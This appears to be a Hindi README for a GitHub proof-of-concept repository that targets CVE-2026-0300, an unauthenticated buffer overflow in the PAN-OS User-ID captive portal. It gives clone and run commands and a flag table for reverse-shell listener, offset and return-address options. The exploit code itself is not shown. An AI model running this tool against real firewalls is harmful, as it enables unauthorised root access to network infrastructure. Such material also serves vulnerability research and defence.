
CVE-2026-0300 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, PAN-OS User-ID Portal में एक गंभीर बफर ओवरफ्लो जो रूट विशेषाधिकारों के साथ अनधिकृत रिमोट कोड निष्पादन को सक्षम बनाता है।
CVE-2026-0300 Palo Alto Networks PAN-OS User-ID™ प्रमाणीकरण पोर्टल (कैप्टिव पोर्टल) में पहचानी गई एक उच्च-गंभीरता वाली बफर ओवरफ्लो भेद्यता है। यह शोध रिपॉजिटरी भेद्यता के तकनीकी तर्क को प्रदर्शित करती है, विशेष रूप से इस बात पर ध्यान केंद्रित करती है कि कैसे एक अनप्रमाणित नेटवर्क पैकेट रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) की ओर ले जा सकता है।
| विशेषता | विवरण |
|---|---|
| CVE ID | CVE-2026-0300 |
| गंभीरता स्कोर | 9.3 (क्रिटिकल) |
| कमजोरी प्रकार | CWE-787: आउट-ऑफ-बाउंड्स राइट |
| हमला वेक्टर | नेटवर्क (अनप्रमाणित) |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| प्रभावित सॉफ्टवेयर | PAN-OS 12.1, 11.2, 11.1, 10.2 |
यह भेद्यता तब उत्पन्न होती है जब User-ID प्रमाणीकरण पोर्टल सेवा मेमोरी बफर में डेटा लिखने से पहले आने वाले डेटा की लंबाई को मान्य करने में विफल रहती है।
socket, struct, और argparse का उपयोग करता है)।git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
यह उपकरण एक पेशेवर CLI (कमांड लाइन इंटरफ़ेस) के साथ डिज़ाइन किया गया है।
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| फ़्लैग | नाम | विवरण | डिफ़ॉल्ट |
|---|---|---|---|
| -t | --target | (आवश्यक) फ़ायरवॉल का लक्ष्य IP पता। | N/A |
| -p | --port | User-ID पोर्टल चलाने वाला पोर्ट। | 6082 |
| -o | --offset | मेमोरी ओवरफ्लो बिंदु तक पहुंचने के लिए बाइट लंबाई। | 2048 |
| -r | --ret | हेक्साडेसिमल रिटर्न पता। | 0xdeadbeef |
| -l | --lhost | रिवर्स शेल IP पता | आपका IP |
| -L | --lport | आपका लिसनर पोर्ट | 4444 |
केवल शैक्षिक और अधिकृत शोध के लिए। उन प्रणालियों के खिलाफ अनधिकृत परीक्षण जिनके आप स्वामी नहीं हैं, अवैध है। लेखक इस शोध कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। वैश्विक सुरक्षा में सुधार के लिए जिम्मेदारी से उपयोग करें। डेवलपर द्वारा: https://t.me/p3Nt3st3rsTAr भेद्यता खोज तिथि: मई 07, 2026